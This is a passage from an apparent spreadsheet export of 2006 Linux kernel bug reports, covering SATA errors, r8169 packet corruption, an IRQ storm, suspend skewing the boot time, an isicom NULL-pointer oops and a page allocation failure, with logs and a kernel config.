ata1: no sense translation for status: 0x50 Nov 13 22:20:01 gleep kernel: ata1: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:20:01 gleep kernel: ata1: status=0x50 { DriveReady SeekComplete } Nov 13 22:20:12 gleep kernel: ata1: no sense translation for status: 0x50 Nov 13 22:20:12 gleep kernel: ata1: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:20:12 gleep kernel: ata1: status=0x50 { DriveReady SeekComplete } ata1 and ata3 are WD2500KS drives, but ata2 and ata4 are WD2500JD drives. The JD drives appear to have no problems (i.e., I have never seen any error messages for those drives.) The error messages do not *appear* to be causing any severe problems (the i/o does not appear to be interrupted), but the messages file gets large very quickly. Steps to reproduce: Attach a WD2500KS hard drive to a Promise SATA300 TX4 controller. Make a filesystem and write data to it. (I do not believe it is necessary to be using the md subsystem to get the error, but I do not have extra hardware to test with.) I originally reported this to the kernel mailing list: http://lkml.org/lkml/2006/10/25/198</t>
  </si>
  <si>
    <t>r8169: Packet corruption on receive for 8111B chip</t>
  </si>
  <si>
    <t>2006-11-14 00:00 UTC</t>
  </si>
  <si>
    <t>Mike Isely</t>
  </si>
  <si>
    <t>2006-12-07 16:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Debian (but stock vanilla kernel.org kernel tree) Hardware Environment: Intel Core 2 Duo E6300 on Gigabyte GA-945GM-S2 mainboard, NIC under test running 100Mbps, full duplex Software Environment: Debian testing installation (last updated early Nov 2006) Problem Description: About 2/3 of received packet data corrupted when using the r8169 driver to operate the onboard Realtek 8111B gigabit ethernet chip Steps to reproduce: modprobe r8169, configure appropriate for operation on your ethernet ping the NIC from another machine Notice that over 60% of the pings don't return An examination of the traffic with wireshark running on the test machine reveals that the machine is not returning most of the pings because the received packet data is being corrupted. The nature of the corruption is that the first 4 bytes of the corrupted packet data is simply missing (and there's 4 bytes of garbage appended at the end so the overall packet size stays the same). Smells like a fencepost error somewhere... I have not tried this with older kernels, but then before 2.6.19, the r8169 driver apparently did not support this chip.</t>
  </si>
  <si>
    <t>Irq storm on Intel-based chipsets</t>
  </si>
  <si>
    <t>2006-11-14 00:48 UTC</t>
  </si>
  <si>
    <t>Vasily Averin</t>
  </si>
  <si>
    <t>2007-06-20 00:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.19-rc5 Hardware Environment: motherboards based on Intel 915G/ICH6 and Intel E7520/ICH5 chipsets Problem Description: IRQ storm occured when IDE controller mode is in native mode Steps to reproduce: 1) install the possible distributions on the node when IDE controller is in legacy mode and cd/dvd is attached into IDE. 2) install the kernel and check that it works well when IDE is in legacy mode 3) reboot, BIOS, switch ide settings to set IDE controler into native mode. For example on ASUSTeK P5GD1-VM motherboard, AMI BIOS Version 1010.005 released 03/29/2005 : BIOS -&gt; Main -&gt; IDE Configuration -&gt; Onboard IDE Operate Mode: Enhanced mode Enhanced mode support on: S-ATA+P-ATA (or to P-ATA) and save the settings 4) booting the kernel, loads the ide-cd module ==&gt; irq assigned for IDE controller (and for one of PCI Express ports) is disabled due irq storm. Comments: noapic, acpi=off, nolapic, irqpoll, pci=routeirq and other kernel commandline options does not help. I've checked Intel spec updates but don't found the similair known issues. I assume that this issue is PCI Express port-related.</t>
  </si>
  <si>
    <t>suspend fools kernel boottime</t>
  </si>
  <si>
    <t>2006-11-14 05:35 UTC</t>
  </si>
  <si>
    <t>Beno</t>
  </si>
  <si>
    <t>2007-08-09 12:02 UTC</t>
  </si>
  <si>
    <t>Hi, i'm using vanilla 2.6.18.2 on ppc. Suspend works great but fools '/proc/stat' btime field so i can't retrieve the real boottime. This results in a incorrect uptime too. The kernel log is also inaccurate because : Nov 12 21:28:47 ibook kernel: [117064.806160] hda: Enabling Ultra DMA 5 Nov 12 21:28:47 ibook kernel: [117064.815242] hdc: Enabling MultiWord DMA 2 &lt;suspend all night long&gt; Nov 13 18:53:28 ibook kernel: [117065.585814] adb: starting probe task... Nov 13 18:53:28 ibook kernel: [117065.840089] ADB keyboard at 2, handler 1 I actually booted on : Nov 7 18:53:34 ibook kernel: [ 0.000000] Linux version 2.6.18.2-ben (benoit@ibook) (version gcc 4.1.2 20061028 (prerelease) (Debian 4.1.1-19)) #3 Mon Nov 6 18:39:04 CET 2006 but today 13 of November, last kernel message is : Nov 13 21:16:03 ibook kernel: [119673.200183] [drm] Loading R200 Microcode which means that uptime is about 1 day and 9h which is wrong grep btime /proc/stat btime 1163329310 # Sun Nov 12 12:01:50 2006 which is wrong too. So please fix, keep btime unchanged.</t>
  </si>
  <si>
    <t>isicom segmentation fault</t>
  </si>
  <si>
    <t>2006-11-14 14:47 UTC</t>
  </si>
  <si>
    <t>Eric</t>
  </si>
  <si>
    <t>2006-11-19 08:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Redhat EL 4 Hardware Environment: Intel x86 Software Environment: Problem Description: Unable to access Modem Steps to reproduce: [root@dialin-0 ~]# setserial -g /dev/ttyM0 Segmentation fault [root@dialin-0 ~]# Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: Oops: 0000 [#1] Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: SMP Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: CPU: 0 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: EIP is at isicom_close+0x12/0x1ab [isicom] Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: eax: f5f14000 ebx: 00000000 ecx: f8922cf0 edx: f7f7fa40 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: esi: 00000000 edi: 00000000 ebp: f5f14000 esp: f5fc7e08 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: ds: 007b es: 007b ss: 0068 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: Process setserial (pid: 4258, ti=f5fc7000 task=f665ad30 task.ti=f5fc7000) Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: Stack: f8922cf0 f7f7fa40 f5f14000 00000000 00000000 00000000 c020c208 00000000 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: 00000000 000200d0 00000002 00000000 f7f7fa40 c033f600 000000d0 c034c5e0 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: 00000003 c034c5d0 00000000 00000001 f5fc7e7c c0117e96 00000000 00000000 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: Call Trace: Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: Code: 89 4d 06 89 c2 89 d8 59 5b 5b 5e 5f 5d e9 79 4e 9b c7 5f 5d 5b 5e 5f 5d c3 55 89 c5 57 56 53 51 51 89 54 24 04 8b 98 c0 01 00 00 &lt;8b&gt; 43 1c 85 db 89 04 24 0f 84 84 01 00 00 89 c6 83 c6 14 89 f0 Message from syslogd@dialin-0 at Tue Nov 14 14:41:38 2006 ... dialin-0 kernel: EIP: [&lt;f8922d02&gt;] isicom_close+0x12/0x1ab [isicom] SS:ESP 0068:f5fc7e08 DMESG: BUG: unable to handle kernel NULL pointer dereference at virtual address 0000001c printing eip: f8922d02 *pde = 35f5c001 Oops: 0000 [#1] SMP Modules linked in: ipv6 autofs4 sunrpc ipt_REJECT xt_tcpudp xt_state ip_conntrack iptable_filter ip_tables x_tables dm_mirror dm_mod button battery asus_acpi ac uhci_hcd ehci_hcd isicom shpchp i2c_i801 i2c_core e1000 floppy ext3 jbd raid1 ata_piix libata sd_mod scsi_mod CPU: 0 EIP: 0060:[&lt;f8922d02&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.18.2 #1) EIP is at isicom_close+0x12/0x1ab [isicom] eax: f5f14000 ebx: 00000000 ecx: f8922cf0 edx: f7f7fa40 esi: 00000000 edi: 00000000 ebp: f5f14000 esp: f5fc7e08 ds: 007b es: 007b ss: 0068 Process setserial (pid: 4258, ti=f5fc7000 task=f665ad30 task.ti=f5fc7000) Stack: f8922cf0 f7f7fa40 f5f14000 00000000 00000000 00000000 c020c208 00000000 00000000 000200d0 00000002 00000000 f7f7fa40 c033f600 000000d0 c034c5e0 00000003 c034c5d0 00000000 00000001 f5fc7e7c c0117e96 00000000 00000000 Call Trace: [&lt;f8922cf0&gt;] isicom_close+0x0/0x1ab [isicom] [&lt;c020c208&gt;] release_dev+0x19b/0x5d4 [&lt;c0117e96&gt;] __wake_up+0x29/0x3c [&lt;c020ac44&gt;] tty_ldisc_enable+0x20/0x22 [&lt;c020bda0&gt;] init_dev+0x370/0x483 [&lt;c020c7ef&gt;] tty_open+0x1ae/0x2bb [&lt;c01621fb&gt;] chrdev_open+0x12f/0x14c [&lt;c01620cc&gt;] chrdev_open+0x0/0x14c [&lt;c0159b98&gt;] __dentry_open+0xc6/0x19e [&lt;c0159d2a&gt;] nameidata_to_filp+0x19/0x28 [&lt;c0159c9b&gt;] do_filp_open+0x2b/0x31 [&lt;c01ca096&gt;] strncpy_from_user+0x3c/0x5b [&lt;c0159f03&gt;] do_sys_open+0x3c/0xaf [&lt;c0159f8c&gt;] sys_open+0x16/0x18 [&lt;c0103235&gt;] sysenter_past_esp+0x56/0x79 Code: 89 4d 06 89 c2 89 d8 59 5b 5b 5e 5f 5d e9 79 4e 9b c7 5f 5d 5b 5e 5f 5d c3 55 89 c5 57 56 53 51 51 89 54 24 04 8b 98 c0 01 00 00 &lt;8b&gt; 43 1c 85 db 89 04 24 0f 84 84 01 00 00 89 c6 83 c6 14 89 f0 EIP: [&lt;f8922d02&gt;] isicom_close+0x12/0x1ab [isicom] SS:ESP 0068:f5fc7e08</t>
  </si>
  <si>
    <t>swapper: page allocation failure</t>
  </si>
  <si>
    <t>2006-11-15 02:45 UTC</t>
  </si>
  <si>
    <t>david</t>
  </si>
  <si>
    <t>2006-11-27 00:36 UTC</t>
  </si>
  <si>
    <t>hello i've found this trace in my kern.log: Nov 14 09:04:36 proxy kernel: swapper: page allocation failure. order:1, mode:0x20 Nov 14 09:04:36 proxy kernel: &lt;c013f4bb&gt; __alloc_pages+0x1df/0x2ab &lt;c0152d08&gt; kmem_getpages+0x2f/0x8b Nov 14 09:04:36 proxy kernel: &lt;c0153929&gt; cache_grow+0xac/0x153 &lt;c0153b1d&gt; cache_alloc_refill+0x14d/0x1d3 Nov 14 09:04:36 proxy kernel: &lt;c0153eaa&gt; __kmalloc+0x5c/0x63 &lt;c024f47e&gt; __alloc_skb+0x44/0xf0 Nov 14 09:04:36 proxy kernel: &lt;c027ab3d&gt; tcp_collapse+0xe9/0x34b &lt;c027aea8&gt; tcp_prune_queue+0x8e/0x1a7 Nov 14 09:04:36 proxy kernel: &lt;c027a5ee&gt; tcp_data_queue+0x2ae/0x714 &lt;c027b610&gt; tcp_rcv_established+0x1dc/0x6cd Nov 14 09:04:36 proxy kernel: &lt;c02a1d11&gt; ipt_hook+0x29/0x31 &lt;c0282edf&gt; tcp_v4_do_rcv+0xcc/0xce Nov 14 09:04:36 proxy kernel: &lt;c02834a2&gt; tcp_v4_rcv+0x5c1/0x7ad &lt;c0262930&gt; nf_hook_slow+0x5d/0xde Nov 14 09:04:36 proxy kernel: &lt;c02699ee&gt; ip_local_deliver+0x103/0x198 &lt;c0269ef1&gt; ip_local_deliver_finish+0x0/0x135 Nov 14 09:04:36 proxy kernel: &lt;c0269cc9&gt; ip_rcv+0x246/0x46e &lt;c026a026&gt; ip_rcv_finish+0x0/0x22a Nov 14 09:04:36 proxy kernel: &lt;f8a21155&gt; e1000_clean_tx_irq+0xd1/0x24d [e1000] &lt;c0254d28&gt; netif_receive_skb+0x189/0x1e2 Nov 14 09:04:36 proxy kernel: &lt;c0254e07&gt; process_backlog+0x86/0x106 &lt;c0254ef3&gt; net_rx_action+0x6c/0xec Nov 14 09:04:36 proxy kernel: &lt;c0123721&gt; __do_softirq+0xbd/0xd2 &lt;c0123768&gt; do_softirq+0x32/0x34 Nov 14 09:04:36 proxy kernel: &lt;c0104e72&gt; do_IRQ+0x1e/0x24 &lt;c010342e&gt; common_interrupt+0x1a/0x20 Nov 14 09:04:36 proxy kernel: &lt;c0100e6f&gt; mwait_idle+0x2f/0x34 &lt;c0100d52&gt; cpu_idle+0x72/0x7b Nov 14 09:04:36 proxy kernel: &lt;c03727e1&gt; start_kernel+0x14e/0x167 &lt;c0372283&gt; unknown_bootoption+0x0/0x1a0 Nov 14 09:04:36 proxy kernel: Mem-info: Nov 14 09:04:36 proxy kernel: DMA per-cpu: Nov 14 09:04:36 proxy kernel: cpu 0 hot: high 0, batch 1 used:0 Nov 14 09:04:36 proxy kernel: cpu 0 cold: high 0, batch 1 used:0 Nov 14 09:04:36 proxy kernel: cpu 1 hot: high 0, batch 1 used:0 Nov 14 09:04:36 proxy kernel: cpu 1 cold: high 0, batch 1 used:0 Nov 14 09:04:36 proxy kernel: DMA32 per-cpu: empty Nov 14 09:04:36 proxy kernel: Normal per-cpu: Nov 14 09:04:36 proxy kernel: cpu 0 hot: high 186, batch 31 used:173 Nov 14 09:04:36 proxy kernel: cpu 0 cold: high 62, batch 15 used:49 Nov 14 09:04:36 proxy kernel: cpu 1 hot: high 186, batch 31 used:169 Nov 14 09:04:36 proxy kernel: cpu 1 cold: high 62, batch 15 used:58 Nov 14 09:04:36 proxy kernel: HighMem per-cpu: Nov 14 09:04:36 proxy kernel: cpu 0 hot: high 186, batch 31 used:29 Nov 14 09:04:36 proxy kernel: cpu 0 cold: high 62, batch 15 used:11 Nov 14 09:04:36 proxy kernel: cpu 1 hot: high 186, batch 31 used:21 Nov 14 09:04:36 proxy kernel: cpu 1 cold: high 62, batch 15 used:8 Nov 14 09:04:36 proxy kernel: Free pages: 108568kB (60316kB HighMem) Nov 14 09:04:36 proxy kernel: Active:344846 inactive:60847 dirty:410 writeback:0 unstable:0 free:27142 slab:79536 mapped:263002 pagetables:307 Nov 14 09:04:36 proxy kernel: DMA free:3548kB min:68kB low:84kB high:100kB active:3844kB inactive:4kB present:16384kB pages_scanned:0 all_unreclaimable? no Nov 14 09:04:36 proxy kernel: lowmem_reserve[]: 0 0 880 2023 Nov 14 09:04:36 proxy kernel: DMA32 free:0kB min:0kB low:0kB high:0kB active:0kB inactive:0kB present:0kB pages_scanned:0 all_unreclaimable? no Nov 14 09:04:36 proxy kernel: lowmem_reserve[]: 0 0 880 2023 Nov 14 09:04:36 proxy kernel: Normal free:44704kB min:3756kB low:4692kB high:5632kB active:386360kB inactive:124328kB present:901120kB pages_scanned:0 all_unreclaimable? no Nov 14 09:04:36 proxy kernel: lowmem_reserve[]: 0 0 0 9149 Nov 14 09:04:36 proxy kernel: HighMem free:60316kB min:512kB low:1732kB high:2952kB active:989180kB inactive:119056kB present:1171072kB pages_scanned:0 all_unreclaimable? no Nov 14 09:04:36 proxy kernel: lowmem_reserve[]: 0 0 0 0 Nov 14 09:04:36 proxy kernel: DMA: 293*4kB 1*8kB 0*16kB 0*32kB 1*64kB 0*128kB 1*256kB 0*512kB 0*1024kB 1*2048kB 0*4096kB = 3548kB Nov 14 09:04:36 proxy kernel: DMA32: empty Nov 14 09:04:36 proxy kernel: Normal: 11000*4kB 0*8kB 0*16kB 0*32kB 1*64kB 1*128kB 0*256kB 1*512kB 0*1024kB 0*2048kB 0*4096kB = 44704kB Nov 14 09:04:36 proxy kernel: HighMem: 1*4kB 4585*8kB 1307*16kB 59*32kB 7*64kB 1*128kB 1*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 60316kB Nov 14 09:04:36 proxy kernel: Swap cache: add 0, delete 0, find 0/0, race 0+0 Nov 14 09:04:36 proxy kernel: Free swap = 4000176kB Nov 14 09:04:36 proxy kernel: Total swap = 4000176kB Nov 14 09:04:36 proxy kernel: Free swap: 4000176kB Nov 14 09:04:36 proxy kernel: 522144 pages of RAM Nov 14 09:04:36 proxy kernel: 292768 pages of HIGHMEM Nov 14 09:04:36 proxy kernel: 5085 reserved pages Nov 14 09:04:36 proxy kernel: 119346 pages shared Nov 14 09:04:36 proxy kernel: 0 pages swap cached Nov 14 09:04:36 proxy kernel: 410 pages dirty Nov 14 09:04:36 proxy kernel: 0 pages writeback Nov 14 09:04:36 proxy kernel: 263002 pages mapped Nov 14 09:04:36 proxy kernel: 79536 pages slab Nov 14 09:04:36 proxy kernel: 307 pages pagetables That this mean? can it make me any problems? I use kernel 2.6.17.7 Debian 3.1r2 cat /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Pentium(R) D CPU 3.00GHz stepping : 2 cpu MHz : 3001.525 cache size : 2048 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe lm constant_tsc pni monitor ds_cpl vmx cid cx16 xtpr lahf_lm bogomips : 6007.14 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 6 model name : Intel(R) Pentium(R) D CPU 3.00GHz stepping : 2 cpu MHz : 3001.525 cache size : 2048 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe lm constant_tsc pni monitor ds_cpl vmx cid cx16 xtpr lahf_lm bogomips : 6000.08 lsmod: Module Size Used by ip_wccp 3456 0 e1000 110904 0 lspci: 0000:00:00.0 Host bridge: Intel Corp.: Unknown device 2770 (rev 02) 0000:00:02.0 VGA compatible controller: Intel Corp.: Unknown device 2772 (rev 02) 0000:00:1b.0 0403: Intel Corp.: Unknown device 27d8 (rev 01) 0000:00:1c.0 PCI bridge: Intel Corp.: Unknown device 27d0 (rev 01) 0000:00:1c.1 PCI bridge: Intel Corp.: Unknown device 27d2 (rev 01) 0000:00:1d.0 USB Controller: Intel Corp.: Unknown device 27c8 (rev 01) 0000:00:1d.1 USB Controller: Intel Corp.: Unknown device 27c9 (rev 01) 0000:00:1d.2 USB Controller: Intel Corp.: Unknown device 27ca (rev 01) 0000:00:1d.3 USB Controller: Intel Corp.: Unknown device 27cb (rev 01) 0000:00:1d.7 USB Controller: Intel Corp.: Unknown device 27cc (rev 01) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev e1) 0000:00:1f.0 ISA bridge: Intel Corp.: Unknown device 27b8 (rev 01) 0000:00:1f.1 IDE interface: Intel Corp.: Unknown device 27df (rev 01) 0000:00:1f.3 SMBus: Intel Corp.: Unknown device 27da (rev 01) 0000:01:04.0 Unknown mass storage controller: Integrated Technology Express, Inc.: Unknown device 8211 (rev 11) 0000:02:00.0 Ethernet controller: Intel Corp.: Unknown device 109a here is my kernel config # # Automatically generated make config: don't edit # Linux kernel version: 2.6.17.7 # Wed Aug 9 13:26:54 2006 # CONFIG_X86_32=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_X86=y CONFIG_MMU=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_HWEIGHT=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" CONFIG_LOCALVERSION_AUTO=y CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_POSIX_MQUEUE is not set CONFIG_BSD_PROCESS_ACCT=y CONFIG_BSD_PROCESS_ACCT_V3=y CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_IKCONFIG=y # CONFIG_IKCONFIG_PROC is not set # CONFIG_CPUSETS is not set # CONFIG_RELAY is not set CONFIG_INITRAMFS_SOURCE="" CONFIG_UID16=y CONFIG_VM86=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_SHMEM=y CONFIG_SLAB=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # CONFIG_SLOB is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_MODVERSIONS=y CONFIG_MODULE_SRCVERSION_ALL=y CONFIG_KMOD=y CONFIG_STOP_MACHINE=y # # Block layer # # CONFIG_LBD is not set # CONFIG_BLK_DEV_IO_TRACE is not set # CONFIG_LSF is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y CONFIG_DEFAULT_AS=y # CONFIG_DEFAULT_DEADLINE is not set # CONFIG_DEFAULT_CFQ is not set # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="anticipatory" # # Processor type and features # CONFIG_SMP=y CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set CONFIG_MPENTIUM4=y # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MEFFICEON is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MGEODEGX1 is not set # CONFIG_MGEODE_LX is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_GENERIC=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_CMPXCHG64=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_TSC=y # CONFIG_HPET_TIMER is not set CONFIG_NR_CPUS=4 CONFIG_SCHED_SMT=y CONFIG_SCHED_MC=y CONFIG_PREEMPT_NONE=y # CONFIG_PREEMPT_VOLUNTARY is not set # CONFIG_PREEMPT is not set # CONFIG_PREEMPT_BKL is not set CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y CONFIG_X86_MCE_P4THERMAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_X86_REBOOTFIXUPS is not set CONFIG_MICROCODE=y CONFIG_X86_MSR=y CONFIG_X86_CPUID=y # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_DELL_RBU is not set # CONFIG_DCDBAS is not set # CONFIG_NOHIGHMEM is not set CONFIG_HIGHMEM4G=y # CONFIG_HIGHMEM64G is not set CONFIG_PAGE_OFFSET=0xC0000000 CONFIG_HIGHMEM=y CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_SPARSEMEM_STATIC=y CONFIG_SPLIT_PTLOCK_CPUS=4 # CONFIG_HIGHPTE is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_IRQBALANCE=y CONFIG_REGPARM=y CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set # CONFIG_HZ_250 is not set CONFIG_HZ_1000=y CONFIG_HZ=1000 # CONFIG_KEXEC is not set # CONFIG_CRASH_DUMP is not set CONFIG_PHYSICAL_START=0x100000 # CONFIG_HOTPLUG_CPU is not set CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y # # Power management options (ACPI, APM) # CONFIG_PM=y CONFIG_PM_LEGACY=y # CONFIG_PM_DEBUG is not set # # ACPI (Advanced Configuration and Power Interface) Support # # CONFIG_ACPI is not set # # APM (Advanced Power Management) BIOS Support # CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set CONFIG_APM_DO_ENABLE=y # CONFIG_APM_CPU_IDLE is not set # CONFIG_APM_DISPLAY_BLANK is not set CONFIG_APM_RTC_IS_GMT=y # CONFIG_APM_ALLOW_INTS is not set CONFIG_APM_REAL_MODE_POWER_OFF=y # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCIEPORTBUS=y # CONFIG_PCI_MSI is not set CONFIG_ISA_DMA_API=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCCARD (PCMCIA/CardBus) support # # CONFIG_PCCARD is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Networking # CONFIG_NET=y # # Networking options # CONFIG_NETDEBUG=y CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_ADVANCED_ROUTER=y CONFIG_ASK_IP_FIB_HASH=y # CONFIG_IP_FIB_TRIE is not set CONFIG_IP_FIB_HASH=y CONFIG_IP_MULTIPLE_TABLES=y CONFIG_IP_ROUTE_FWMARK=y CONFIG_IP_ROUTE_MULTIPATH=y # CONFIG_IP_ROUTE_MULTIPATH_CACHED is not set CONFIG_IP_ROUTE_VERBOSE=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=y CONFIG_NET_IPGRE=m # CONFIG_NET_IPGRE_BROADCAST is not set CONFIG_IP_MROUTE=y # CONFIG_IP_PIMSM_V1 is not set # CONFIG_IP_PIMSM_V2 is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # CONFIG_INET_XFRM_TUNNEL is not set CONFIG_INET_TUNNEL=y CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_BIC=y # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_INET6_XFRM_TUNNEL is not set # CONFIG_INET6_TUNNEL is not set CONFIG_NETFILTER=y CONFIG_NETFILTER_DEBUG=y # # Core Netfilter Configuration # # CONFIG_NETFILTER_NETLINK is not set CONFIG_NETFILTER_XTABLES=y # CONFIG_NETFILTER_XT_TARGET_CLASSIFY is not set CONFIG_NETFILTER_XT_TARGET_MARK=y # CONFIG_NETFILTER_XT_TARGET_NFQUEUE is not set # CONFIG_NETFILTER_XT_TARGET_NOTRACK is not set # CONFIG_NETFILTER_XT_MATCH_COMMENT is not set CONFIG_NETFILTER_XT_MATCH_CONNBYTES=y CONFIG_NETFILTER_XT_MATCH_CONNMARK=y CONFIG_NETFILTER_XT_MATCH_CONNTRACK=y # CONFIG_NETFILTER_XT_MATCH_DCCP is not set # CONFIG_NETFILTER_XT_MATCH_ESP is not set # CONFIG_NETFILTER_XT_MATCH_HELPER is not set CONFIG_NETFILTER_XT_MATCH_LENGTH=y CONFIG_NETFILTER_XT_MATCH_LIMIT=y # CONFIG_NETFILTER_XT_MATCH_MAC is not set CONFIG_NETFILTER_XT_MATCH_MARK=y CONFIG_NETFILTER_XT_MATCH_MULTIPORT=y # CONFIG_NETFILTER_XT_MATCH_PKTTYPE is not set # CONFIG_NETFILTER_XT_MATCH_REALM is not set # CONFIG_NETFILTER_XT_MATCH_SCTP is not set # CONFIG_NETFILTER_XT_MATCH_STATE is not set CONFIG_NETFILTER_XT_MATCH_STRING=y # CONFIG_NETFILTER_XT_MATCH_TCPMSS is 